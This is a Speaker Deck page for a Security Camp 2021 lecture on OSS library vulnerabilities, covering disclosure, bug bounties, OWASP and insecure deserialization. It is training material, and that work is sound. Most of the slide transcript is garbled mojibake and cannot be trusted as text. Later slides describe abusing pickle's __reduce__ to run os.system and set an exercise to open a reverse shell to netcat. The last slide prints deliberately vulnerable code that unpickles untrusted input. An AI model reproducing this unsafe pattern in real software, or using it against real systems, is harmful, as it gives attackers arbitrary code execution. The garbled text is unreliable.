Upgrade to Pro — share decks privately, control downloads, hide ads and more …

趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

20c5ddcad23304aed77ce8c3aa020562?s=47 @tkmru
September 19, 2021
Programming
0
1.2k

 趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

GitHubリポジトリ:
https://github.com/tkmru/seccamp2021-b5

講義紹介ページ:
https://www.ipa.go.jp/jinzai/camp/2021/zenkoku2021_program_list.html#list_b5

20c5ddcad23304aed77ce8c3aa020562?s=128

@tkmru

September 19, 2021
Tweet

More Decks by @tkmru

See All by @tkmru
20c5ddcad23304aed77ce8c3aa020562?s=48 tkmru
1
150
20c5ddcad23304aed77ce8c3aa020562?s=48 tkmru
3
480
20c5ddcad23304aed77ce8c3aa020562?s=48 tkmru
0
130
20c5ddcad23304aed77ce8c3aa020562?s=48 tkmru
0
2.9k
20c5ddcad23304aed77ce8c3aa020562?s=48 tkmru
20
9.7k
20c5ddcad23304aed77ce8c3aa020562?s=48 tkmru
1
1.3k
20c5ddcad23304aed77ce8c3aa020562?s=48 tkmru
0
160
20c5ddcad23304aed77ce8c3aa020562?s=48 tkmru
1
240
20c5ddcad23304aed77ce8c3aa020562?s=48 tkmru
0
170

Other Decks in Programming

See All in Programming
6aaaf03c4f5c681d89c3078bd6070a6f?s=48 rumi_yamaguchi
0
1.4k
1bc80e2eee2adeaa8bb577798d92e9d0?s=48 antonarhipov
0
130
Ea059a886741b21e8d1dd992129634f7?s=48 ytsuzaki
1
340
Fe1782174fa3f0a2d07011df414a1267?s=48 evils
0
230
52c76fb01bb5d1908f91b0231a44a7b5?s=48 boriswilhelms
0
130
Eabc3d48a76f6827e35a4cd0a44008b3?s=48 sunyryr
0
340
Fc59401781a26b10f5d4fc5b758fb3b7?s=48 andrewradev
0
100
E41c91eb3efe7a796b8ae20c51a07f06?s=48 takoba
1
180
0c2ae3d2aa77423465e1e533ff0d030a?s=48 mski_iksm
5
1.9k
15934fa2aa7b2ce21f091e9b7cffa856?s=48 manfredsteyer
PRO
0
190
Acdecb7b4baebb0d4c521626d21adc6a?s=48 motikoma
0
460
B793da271a45d149b52f507bca9f137c?s=48 77web
2
630

Featured

See All Featured
245cee81a9c424266e5e401d844ea881?s=48 lara
596
62k
95d9f37115fbb0d13135d0f77132f856?s=48 morganepeng
31
1.8k
Ecdea9b9714877b86cee08458f085481?s=48 trallard
25
1.2k
864a009ac73600c7c02e1f26629dd989?s=48 paigeccino
5
200
Fde6c3a50ca518a909ef35c22c0ee0e4?s=48 destraynor
148
20k
Af6a12710770ad9a7cfd08c97efd40d3?s=48 pedronauck
655
120k
C86443373fbfe92996aa882d0d7a59f8?s=48 imathis
484
150k
170b760e0147792d0140e59ec78e9893?s=48 eitanlees
120
11k
56c4053438af8e8b90d6f53cbb7573be?s=48 jakevdp
778
200k
A9704266587836f7e784235e5073b93e?s=48 jmmastey
20
5.1k
8081b26e05bb4354f7d65ffc34cbbd67?s=48 chriscoyier
498
130k
Bfd6b681ec6e8c9bef82ff0521c364f7?s=48 kastner
56
2.1k

Transcript

  1. झຯͱ࣮ӹͷͨΊͷ ஶ໊ͳ044ϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯ גࣜձࣾΞΧπΩ খ஛ɹହҰ

  2. ࣗݾ঺հ w খ஛ɹହҰ w (JU)VC5XJUUFSULNSV w ॴଐגࣜձࣾΞΧπΩ w ੬ऑੑ਍அ w

    νʔτରࡦπʔϧ։ൃͳͲ 

  3. ࣗݾ঺հ ஶॻ

  4. ηΩϡϦςΟɾΩϟϯϓͱͳ͔Α͠ʂ w ηΩϡϦςΟɾΩϟϯϓશࠃେձࢀՃ w ηΩϡϦςΟɾϛχΩϟϯϓJOژ౎νϡʔλʔ w ηΩϡϦςΟɾϛχΩϟϯϓJOਆށνϡʔλʔ w ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯߨࢣ w

    ηΩϡϦςΟɾΩϟϯϓશࠃେձΦϯϥΠϯߨࢣ ࣗݾ঺հ 

  5. #MBDL)BU"STFOBMͱ΋ͳ͔Α͠ʢʁʣ w #MBDL)BU64""STFOBM w "OESPJEΞϓϦ޲͚ϝϞϦվ͟ΜπʔϧʮBQLNFEJUʯΛൃද w #MBDL)BU64""STFOBM w J04ΞϓϦ޲͚ϝϞϦվ͟ΜπʔϧʮJQBNFEJUʯΛൃද w

    #MBDL)BU&VSPQF"STFOBM w 5#" ࣗݾ঺հ 

  6. ຊ೔ͷߨٛʹ͍ͭͯ  w ԋश؀ڥߏஙͷͨΊͷίϚϯυͷ৘ใ͕εϥΠυʹࡌ͍ͬͯΔͷͰίϐϖͰ ߏஙͰ͖ΔΑ͏ʹεϥΠυ͸4MBDL্Ͱ഑෍ͯ͋͠Γ·͢ w ԋशͷͱ͖͸֤ࣗͰεϥΠυ͔͞ͷ΅Γͭͭ΍ͬͯ΋Β͑Δͱ🙏 w ޙ೔ެ։൛Λ4QFBLFS%FDLͰެ։͢ΔͷͰݟֶ࿮ͷਓͨͪ͸ ଴͍ͬͯͯͩ͘͞🙇

    w (JU)VCϦϙδτϦ w IUUQTHJUIVCDPNULNSVTFDDBNQC

  7. ຊ೔ͷߨٛʹ͍ͭͯ 

  8. ຊ೔ͷߨٛʹ͍ͭͯ ӕͰ͢ʢҰ෦ʣ 

  9. ຊ೔ͷߨٛʹ͍ͭͯ w ߨٛ֓ཁΛߟ͑ͨͷ͸໿ϲ݄લʜ w ౰࣌͸9.-ύʔαʹओ࣠Λ͓͍ͨߨٛΛ͠Α͏ͱࢥ͍ͬͯͨ w ͋ͱͰߟ͑௚͢ͱগ͠είʔϓ͕ڱ͍ w ͱ͍͏͜ͱͰɺѻ͏੬ऑੑΛ૿΍͍ͯ͠·͢ʂ 

  10. ͦ΋ͦ΋੬ऑੑͱ͸ w ιϑτ΢ΣΞʹ͓͚ΔηΩϡϦςΟ্ͷ໰୊Օॴ w ιϑτ΢ΣΞͷྫϥΠϒϥϦɺ04ɺ8FCΞϓϦέʔγϣϯͳͲ w ໰୊ՕॴΛ߈ܸ͞ΕΔ͜ͱͰɺຊདྷͷػೳΛଛͳ͍ɺϢʔβ͕ෆརӹΛඃΔ w ৘ใͷ࿙ӮͳͲ w

    ˠ੬ऑੑΛ߈ܸऀΑΓૣ͘ൃݟͯ͠मਖ਼͍ͯ͘͠ඞཁ͕͋Δʂʂ 

  11. ຊ೔ͷߨٛͷྲྀΕ w ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢલ࠲ʣ w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w 9.-ύʔαʹର͢Δ߈ܸख๏ w ٕज़ͱ޲͖߹͏࢟੎ͷ࿩ʢ͍͍࿩ʣ 

  12. ୈ̍ষ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηε

  13. ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηε w اۀͰߦΘΕΔ੬ऑੑ਍அ w ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ w ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 

  14. اۀͰߦΘΕΔ੬ऑੑ਍அ w ηΩϡϦςΟΤϯδχΞ͕੬ऑੑ͕ͳ͍͔֬ೝ͢Δ͜ͱΛ੬ऑੑ਍அͱ͍͏ w αʔϏεͷϦϦʔεલ΍ɺ௥ՃͰେ͖ͳػೳΛ࣮૷ͨ͠ࡍʹߦΘΕΔ w 8FCΞϓϦέʔγϣϯ΍εϚϗΞϓϦɺ*P5ػثͳͲ͕ର৅ w ηΩϡϦςΟϕϯμʹ֎஫ɺ·ͨ͸಺੡Ͱ࣮ࢪ͞ΕΔ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̍ʣ

    

  15. اۀͰߦΘΕΔ੬ऑੑ਍அ ੬ऑੑ਍அͷ༷ࢠʢʣ w ੬ऑੑΛൃݟ͢Δʹ͸༷ʑͳ؍఺͕͋Δ͕ɺΞϓϦέʔγϣϯͱαʔόؒͷ ௨৴Λ֬ೝɾվ͟Μ͢Δ͜ͱͰൃݟͰ͖Δ੬ऑੑ͕ଟ͍ ϓϩΩγπʔϧΛ࢖ͬͯ௨৴಺༰Λ֬ೝ͢Δ ηΩϡϦςΟΤϯδχΞ αʔό ਍அର৅ 

  16. اۀͰߦΘΕΔ੬ऑੑ਍அ ੬ऑੑ਍அͷ༷ࢠʢʣ w ηΩϡϦςΟΤϯδχΞ͕ݟ͚ͭͨ੬ऑੑΛ։ൃऀʹใࠂ w ։ൃऀ͕ΞϓϦέʔγϣϯΛमਖ਼ ηΩϡϦςΟΤϯδχΞ ใࠂΛड͚ͯ੬ऑੑΛमਖ਼͢Δ։ൃऀ ηΩϡΞͳঢ়ଶͰαʔϏεΛϦϦʔε 

  17. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ w ݚڀ໨తͰ͋ͬͨΓझຯͰ͋ͬͨΓͰɺੈͷதʹެ։͞Ε͍ͯΔιϑτ΢Σ Ξͷ੬ऑੑΛউखʹݟ͚ͭΔਓ͕͍ͨͪΔ w ൃݟͨ͠੬ऑੑ͕ެ։͞ΕΔͱݟ͚ͭͨਓͷ੒ՌͱͳΔͷͰ͏Ε͍͠ w ͓ۚ💰͕΋Β͑Δ੍౓΋͋Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̎ʣ 

  18. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ใࠂऀʹใ঑ۚΛ౉͢όάό΢ϯςΟ w ࣗࣾͷ੡඼ͷ੬ऑੑΛใࠂͯ͘͠Εͨਓʹ੬ऑੑͷӨڹ౓ʹ४ͯ͡ใ঑ۚΛ ౉੍͢౓ w ੬ऑੑΛѱ༻͞ΕΔΑΓɺใ঑ۚΛ͔͚ͯͰ΋ใࠂͯ͠΋Βͬͨ΄͏͕͍͍ w ੬ऑੑ਍அͱҧͬͯຊ൪؀ڥʹ߈ܸߦҝ͕ߦΘΕΔ w

    اۀ͕ηΩϡϦςΟରࡦʹ஫ྗ͍ͯ͠Δ͜ͱͷ13ʹ΋ͭͳ͕Δ 

  19. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ஶ໊όάό΢ϯςΟαʔϏε w )BDLFS0OF w 4UBSCVDLTɺ/JOUFOEPɺ-*/&ɺ50:05"ͳͲ w CVHDSPXE w *OEFFEɺ/FUqJYɺ5FTMBɺ.BTUFSDBSEͳͲ

    w #VH#VOUZKQ w $IBUXPSLɺCJUCBOLͳͲ 

  20. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ *1"΁ͷใࠂ w όάό΢ϯςΟΛ΍͍ͬͯͳ͍αʔϏε΍ɺ044ͷιϑτ΢ΣΞͷ੬ऑੑΛ ݟ͚ͭͯ͠·͏ʢݟ͚͍ͭͨʢʁʣʣ͜ͱ΋͋Δ w ͦΜͳͱ͖͸*1"ʹใࠂ͢Δͱ։ൃऀ΁ͷ࿈བྷΛߦͬͯ͘ΕΔ w ੬ऑੑؔ࿈৘ใͷಧग़ड෇ ʢIUUQTXXXJQBHPKQTFDVSJUZWVMOSFQPSUʣ

    w ։ൃऀͱ௚઀΍ΓऔΓ͢ΔͱᎍΊΔՄೳੑ͕͋Δ 

  21. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ *1"΁ͷใࠂ IUUQTJTFDWVMGPSNJQBHPKQJQBWVMNBJOJOEFYIUNM

  22. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ใࠂͨ͠੬ऑੑʹ$7&͕ͭ͘͜ͱ΋ w $7&ʢ$PNNPO7VMOFSBCJMJUJFTBOE&YQPTVSFTʣɿڞ௨੬ऑੑࣝผࢠ w .*53&͕ࣾ৘ใڞ༗ͷͨΊʹ֤੬ऑੑʹݻ༗ͷ$7&*%ΛׂΓৼ͍ͬͯΔ w ੲɺ֤छ੡඼ϕϯμʔ΍ηΩϡϦςΟϕϯμʔ͕ɺ੬ऑੑʹରͯ͠ಠࣗʹ ໊લΛ෇͚͍ͯͨ w

    ೥ʹ$7&͕ొ৔͠ɺ੬ऑੑ৘ใͷൺֱΛ༰қʹߦ͑ΔΑ͏ʹͳͬͨ w ݟ͚ͭͨ੬ऑੑʹ$7&͕ͭ͘ͱࣗຫͰ͖Δ 

  23. ࡏ໺ͷΤϯδχΞʹΑΔ੬ऑੑใࠂ ੬ऑੑʹ$7&͕ͭ͘·ͰͷྲྀΕ w ೔ຊͰ͸*1"ͱ+1$&35$$͕.*53&ࣾͱ࿈ܞͯ͠ݟ͔ͭͬͨ੬ऑੑʹରͯ͠ $7&Λ࠾൪͢ΔऔΓ૊ΈΛߦ͍ͬͯΔ 

  24. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ͜͜·Ͱݟ͖ͯͨͱ͓Γɺ੬ऑੑ͸೔ʑൃݟ͞Ε͍ͯΔ w ੬ऑੑͷ͋Διϑτ΢ΣΞΛ༻͍͍ͯΔ͚ͩͰ੬ऑੑͱͳΓ͏Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ  IUUQTXXXJQBHPKQTFDVSJUZWVMOSFQPSUWVMORIUNM

  25. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ਵ࣌ൃݟ͞ΕΔϥΠϒϥϦ΍04౳ͷ੬ऑੑʹ͸ϦϦʔεલʹ࣮ࢪ͢Δ ੬ऑੑ਍அͰ͸ରԠͰ͖ͳ͍ w ӡ༻޻ఔͰ੬ऑੑͷରԠΛ͢Δඞཁ͕͋Δ w ੬ऑੑͷରࡦํ๏͕ެ։͞ΕΔલʹɺ߈ܸ͕ߦΘΕΔ͜ͱ΋͋ΔʢθϩσΠ ߈ܸʣ w

    Өڹ౓͕ߴ͍੬ऑੑ͕ެ։͞Εͨ৔߹͸ਝ଎ʹରԠ͢Δඞཁ͕͋Δ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ 

  26. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ w ӡ༻࣌ʹ੬ऑੑͷ͋Διϑτ΢ΣΞ͕͋Ε͹Ξοϓσʔτ͍͖͍ͯͨ͠ w ˠαʔό಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ7VMT w ˠίϯςφ಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ5SJWZ ࣾձʹ͓͚Δ੬ऑੑൃݟϓϩηεʢͦͷ̏ʣ 

  27. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ αʔό಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ7VMT w 7VMTʢ76-OFSBCJMJUZ4DBOOFSʣ w IUUQTHJUIVCDPNGVUVSFBSDIJUFDUWVMT w ϑϡʔνϟʔגࣜձ͕ࣾ։ൃ͍ͯ͠Δ044ͷ੬ऑੑεΩϟφ w αʔό಺Ͱ༻͍͍ͯΔιϑτ΢ΣΞʹ੬ऑੑΛؚΉόʔδϣϯͷ΋ͷ͕ͳ͍͔

    ֬ೝ 

  28. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 7VMTͷ࢓૊Έ IUUQTHJUIVCDPNGVUVSFBSDIJUFDUWVMT 

  29. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ ίϯςφ಺ͷιϑτ΢ΣΞΛ୳ࡧ͢Δ5SJWZ w "RVB4FDVSJUZ͕։ൃ͍ͯ͠Δ044ͷ੬ऑੑεΩϟφ w IUUQTHJUIVCDPNBRVBTFDVSJUZUSJWZ w %PDLFSΠϝʔδΛεΩϟϯͰ͖Δ w ϝϯς͞Ε͍ͯͳ͍ެࣜ%PDLFSΠϝʔδ΋ଟ͍

    w "4JNQMFBOE$PNQSFIFOTJWF7VMOFSBCJMJUZ4DBOOFSGPS$POUBJOFST  4VJUBCMFGPS$* w $*ʹ૊ΈࠐΉ͜ͱ΋Ͱ͖ͯศར 

  30. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ Ϋϥ΢υ؀ڥͷઃఆ΋νΣοΫ͍ͨ͠ w "84΍($1ͷઃఆϛεʹΑΔ੬ऑੑ΋͋Δ w ೔ʑɺΠϯϑϥͷઃఆ͸มΘ͍ͬͯ͘ͷͰɺϦϦʔεલͷ੬ऑੑ਍அͰ͸ ๷͛ͳ͍ w ੬ऑͳ෦෼Λ߈ܸऀ͸CPUΛ༻͍ͯߴ଎ʹ୳ͯ͘͠Δ 

  31. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 4όέοτ͸Α͘ૂΘΕ͍ͯΔ w Α͘ૂΘΕ͍ͯΔ"84ͷ࢓૊Έͷͻͱͭʹ4όέοτ͕͋Δ w ਖ਼໊ࣜশ"NB[PO4 "NB[PO4JNQMF4UPSBHF4FSWJDF  w Πϯλʔωοτܦ༝Ͱར༻Ͱ͖ΔετϨʔδαʔϏε

    w 4όέοτσʔλͷஔ͖৔ॴ w ੩తϑΝΠϧϗεςΟϯά͕Ͱ͖8FCαʔόͱͯ͠΋࢖༻Ͱ͖Δ w ༷ʑͳσʔλ͕ஔ͔ΕΔͷͰɺσʔλ͕ཉ͍͠߈ܸऀʹૂΘΕΔ 

  32. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ ࡢࠓͷΠϯγσϯτࣄྫ w 4όέοτઃఆϛεʹΑΔԯສੈଳҎ্ͷݸਓ৘ใ࿙Ӯ w ΧϦϑΥϧχΞΛڌ఺ͱ͢Δσʔλ෼ੳձࣾͰ͋Δ"MUFSZY͔ࣾΒͷ࿙Ӯ w IUUQTXXXUSFOENJDSPDPNWJOGPQMTFDVSJUZOFXTWJSUVBMJ[BUJPOBOEDMPVEEBUBPONJMMJPOVT IPVTFIPMETFYQPTFEEVFUPNJTDPOpHVSFEBXTTCVDLFU w

    ެ։4όέοτΛɺϚϧ΢ΣΞΛ࢓ࠐΜͩঢ়ଶͰ্ॻ͖͢Δ߈ܸऀ w ޡͬͯॻ͖ࠐΈΛڐՄ͞Ε͍ͯΔόέοτʹϚϧ΢ΣΞΛॻ͖ࠐΈ w IUUQTXXXNDBGFFDPNCMPHTFOUFSQSJTFDMPVETFDVSJUZNDBGFFEJTDPWFSTHIPTUXSJUFSBQFSWBTJWFBXTT NBOJOUIFNJEEMFFYQPTVSF 

  33. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ "84$POpH w "84ͷ֤छઃఆ͕ϧʔϧͲ͓Γʹઃఆ͞Ε͍ͯΔ͔ධՁ͢ΔαʔϏε w ެ։͞Ε͍ͯΔηΩϡϦςΟάϧʔϓ͕ଘࡏ͠ͳ͍͔ʁ w 4όέοτ͕ެ։ઃఆʹͳ͍ͬͯͳ͍͔ʁ w ެ։͞Ε͍ͯΔ&#43%4εφοϓγϣοτ͕ଘࡏ͠ͳ͍͔ʁ

    

  34. ͲͷΑ͏ͳ੬ऑੑ͕ݟ͔ͭΔͷ͔

  35. 08"415PQ 08"41ͱ͸ w 08"41ʢ0QFO8FC"QQMJDBUJPO4FDVSJUZ1SPKFDUʣ͸ηΩϡϦςΟͷ ܒ໤ͱීٴΛ໨తͱͨ͠/10ஂମ w ੈքதʹڌ఺͕͋Δ w ೔ຊʹ΋͋ͬͯυΩϡϝϯτΛެ։ͨ͠ΓษڧձΛओ࠵ͨ͠Γ͍ͯ͠Δ w

    IUUQTPXBTQPSHXXXDIBQUFSKBQBO w 08"415PQ͸8FCΞϓϦέʔγϣϯʹ͓͍ͯ Α͘ݟ͔ͭΔ੬ऑੑϥϯΩϯά 

  36. 08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΠϯδΣΫγϣϯ߈ܸ w ೝূͷෆඋ w ػඍͳ৘ใͷ࿐ग़ w 99&

    w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳηΩϡϦςΟઃఆ w 944 w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w ط஌ͷ੬ऑੑͷ͋Δίϯϙʔωϯτ ͷ࢖༻ w ෆे෼ͳϩΪϯάͱϞχλϦϯά 

  37. 08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ  IUUQTHJUIVCDPN08"415PQCMPCNBTUFSEPDT"@@*OUSPEVDUJPONE

  38. 08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳ҉߸Խ w ΠϯδΣΫγϣϯ w ҆શͰͳ͍ઃܭ

    w ෆద੾ͳηΩϡϦςΟઃఆ w ੬ऑͳݹ͍ίϯϙʔωϯτ w ෆద੾ͳ*EFOUJpDBUJPOͱ "VUIFOUJDBUJPO w ιϑτ΢ΣΞͱσʔλͷ੔߹ͷෆඋ w ηΩϡϦςΟϩάͱϞχλϦϯάͷෆ උ w αʔόʔαΠυϦΫΤετϑΥʔδΣϦ ʢ443'ʣ 

  39. ߨٛͰѻ͏੬ऑੑ w ୊झຯͱ࣮ӹͷͨΊͷஶ໊ͳ044ϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ w 044ϥΠϒϥϦىҼͱ͍ͬͯ΋෯޿͍ʜ w ֤ϓϩάϥϛϯάݴޠʹσϑΥϧτͰଘࡏ͢ΔϥΠϒϥϦىҼͷ੬ऑੑʹয ఺Λ౰ͯΔˠ࡞Γࠐ·Ε΍͍͢ʂʂ w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ

    w 9.-ύʔαؔ࿈ 

  40. 08"415PQ 08"41ʹΑΔ΍ΒΕ؀ڥ w 08"41͸੬ऑੑΛ࡞Γࠐ·Εͨԋश༻ͷΞϓϦͷެ։΋͍ͯ͠Δ w +VJDF4IPQʢIUUQTHJUIVCDPNCLJNNJOJDIKVJDFTIPQʣ w 3BJMT(PBUʢIUUQTHJUIVCDPN08"41SBJMTHPBUʣ w %74"ʢIUUQTHJUIVCDPN08"41%74"ʣ

    w ͳͲ w ษڧʹͳΔͷͰ΍ͬͯΈ͍ͯͩ͘͞ʂ 

  41. ୈ̎ষ ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ

  42. γϦΞϥΠζͱσγϦΞϥΠζ γϦΞϥΠζͱ͸ w γϦΞϥΠζ ഑ྻ΍ΫϥεͳͲͷΦϒδΣΫτΛόΠτྻܗࣜͷσʔλ΁มߋ͢Δ͜ͱ w σγϦΞϥΠζʢΞϯγϦΞϥΠζʣ γϦΞϥΠζ͞ΕΔ͜ͱʹΑͬͯੜ੒͞ΕͨόΠτྻܗࣜͷσʔλΛ ΦϒδΣΫτ΁໭͢͜ͱ w

    ༻్ ෳࡶͳσʔλ΍ΦϒδΣΫτͳͲͷεφοϓγϣοτΛऔΔ ϑΝΠϧ΍%#ʹอଘ͢Δࡍ΍ɺωοτϫʔΫΛ௨ͯ͡ૹ৴͢ΔͳͲ 

  43. 1ZUIPOͰͷγϦΞϥΠζσγϦΞϥΠζ w QJDLMFϞδϡʔϧͷQJDLMFEVNQT ɺQJDLMFMPBET ͳͲͰ γϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ  { 'name':

    'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ', 'year': 2021, 'place': ‘online' } b'\x80\x04\x95k\x00\x00\x00\x00\x00\x00\x00}\x94( \x8c\x04name\x94\x8cA\xe3\x82\xbb\xe3\x82\xad\xe3 \x83\xa5\xe3\x83\xaa\xe3\x83\x86\xe3\x82\xa3\xe3\ x83\xbb\xe3\x82\xad\xe3\x83\xa3\xe3\x83\xb3\xe3\x 83\x97\xe5\x85\xa8\xe5\x9b\xbd\xe5\xa4\xa7\xe4\xb c\x9a2021 \xe3\x82\xaa\xe3\x83\xb3\xe3\x83\xa9\xe3\x82\xa4\ xe3\x83\xb3\x94\x8c\x04year\x94M\xe5\x07\x8c\x05p lace\x94\x8c\x06online\x94u.’

  44. 1)1ͰͷγϦΞϥΠζσγϦΞϥΠζ w ඪ४ؔ਺ͷTFSJBMJ[F ͱVOTFSJBMJ[F ͰγϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ  array( 'name'=>'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ’,

    'year'=>2021, 'place'=>'online' ) a:3:{s:4:"name";s:65:"ηΩϡϦςΟɾΩϟϯϓશࠃେձ 2021 ΦϯϥΠ ϯ”;s:4:”year";i:2021;s:5:"place";s:6:"online";}

  45. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ Ϣʔβ͔Βͷೖྗ஋͸ཁ஫ҙ w Ϣʔβ͔Βͷೖྗ஋Λͦͷ··σγϦΞϥΠζ͍ͯ͠Δͱɺ ੜ੒͞ΕΔΦϒδΣΫτΛϢʔβ͕ίϯτϩʔϧͰ͖ͯ͠·͏  ࡉ޻͞ΕͨσʔλΛૹ৴ ߈ܸऀ͕ࢦఆͨ͠ ΦϒδΣΫτ͕ੜ੒͞ΕΔ

  46. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ϚδοΫϝιουΛ࢖͏ w ϚδοΫϝιουಛఆͷΠϕϯτ࣌ʹ҉໧తʹ࣮ߦ͞ΕΔϝιου w ϓϩάϥϛϯάݴޠ಺෦Ͱ࣮ߦ͞Ε͍ͯΔ w ֤ݴޠʹΑͬͯҟͳΔ w ΦϒδΣΫτ͕ੜ੒͞ΕΔࡍʹݺͼग़͞ΕΔϚδοΫϝιουΛ߈ܸʹར༻Մೳ

    w ΦϒδΣΫτ͕ੜ੒͞ΕΔࡍʹ࣮ߦ͢ΔίʔυΛࢦఆͰ͖Δ w ˠϢʔβ͕೚ҙίʔυΛ࣮ߦՄೳʂ 

  47. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ 1ZUIPOެࣜυΩϡϝϯτ  IUUQTEPDTQZUIPOPSHKBMJCSBSZQJDLMFIUNM

  48. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ 1)1ެࣜυΩϡϝϯτ  IUUQTXXXQIQOFUNBOVBMKBGVODUJPOVOTFSJBMJ[FQIQ

  49. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ۩ମతͳ߈ܸํ๏ʢ1ZUIPOͷ৔߹ʣ w 1ZUIPOͰγϦΞϥΠζσγϦΞϥΠζ͸QJDLMFԽVOQJDLMFԽͱݺ͹Ε͍ͯΔ w QJDLMFEVNQT Λ࢖ͬͯΦϒδΣΫτΛQJDLMFԽ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ͠@@SFEVDF@@ ϝιου͕஌ΒΕ͍ͯΔ

    w ݺͼग़͠ՄೳͳΦϒδΣΫτͱҾ਺Λλϓϧͱͯ͠ࢦఆ͢Δͱ࣮ߦͯ͘͠ΕΔ w ˠ@@SFEVDF@@ ϝιουͰPTTZTUFN Λ࣮ߦ͢ΔΦϒδΣΫτΛQJDLMFԽͯ͠ ૹ৴͢Δ͜ͱͰ೚ҙίʔυ࣮ߦʹ࣋ͪࠐΊΔʂ 

  50. ࣄલ՝୊݉બߟ՝୊& w 1ZUIPOʹ͸QJDLMFͱ͍͏ඪ४Ϟδϡʔϧ͕͋Γ·͢ɻQJDLMFͷެࣜυΩϡϝϯτʹهࡌ͞ Ε͍ͯΔΑ͏ʹɺQJDLMFͰ৴པͰ͖ͳ͍஋ΛσγϦΞϥΠζ͢Δ͜ͱ͸੬ऑੑͷݪҼͱͳ Γಘ·͢ɻͦͷཧ༝͓Αͼ߈ܸख๏ʹ͍ͭͯɺҎԼͷখ໰   ʹճ౴͍ͯͩ͘͠͞ɻ w খ໰

      Կނɺ੬ऑੑͱͳΔͷ͔Λઆ໌͍ͯͩ͘͠͞ʢඞਢճ౴ʣ w খ໰   ҎԼͷ1ZUIPOͷιʔείʔυʹ͸্هͷ੬ऑੑ͕ଘࡏ͠·͢ɻ ͜ͷ੬ऑੑΛ༻͍ͯɺ5$1ͷ൪ϙʔτʹର͢ΔϦόʔεγΣϧΛ࡞੒͍ͯͩ͘͠͞ɻ OFUDBUͰ൪ϙʔτΛ଴ͪड͚͓͖ͯɺ઀ଓཱ͕֬ͨ͠ޙɺMTͳͲͷίϚϯυΛଧͪࠐ Έ݁Ռ͕ฦͬͯ͘Ε͹ਖ਼ղͰ͢ɻʢҰ෦লུʣʢඞਢճ౴ʣ  ໰୊จ

  51. બߟ՝୊&  #!/usr/bin/env python3 # coding: UTF-8 import sys import

    base64 import pickle args = sys.argv if len(args) != 2: print('ୈҰҾ਺ʹBase64Τϯίʔυ͞ΕͨจࣈྻΛࢦఆ͍ͯͩ͘͠͞') try: data = base64.urlsafe_b64decode(args[1]) deserialized = pickle.loads(data) print('deserialized: {0}'.format(deserialized)) except: print('Failed to deserialize') ໰୊ίʔυ

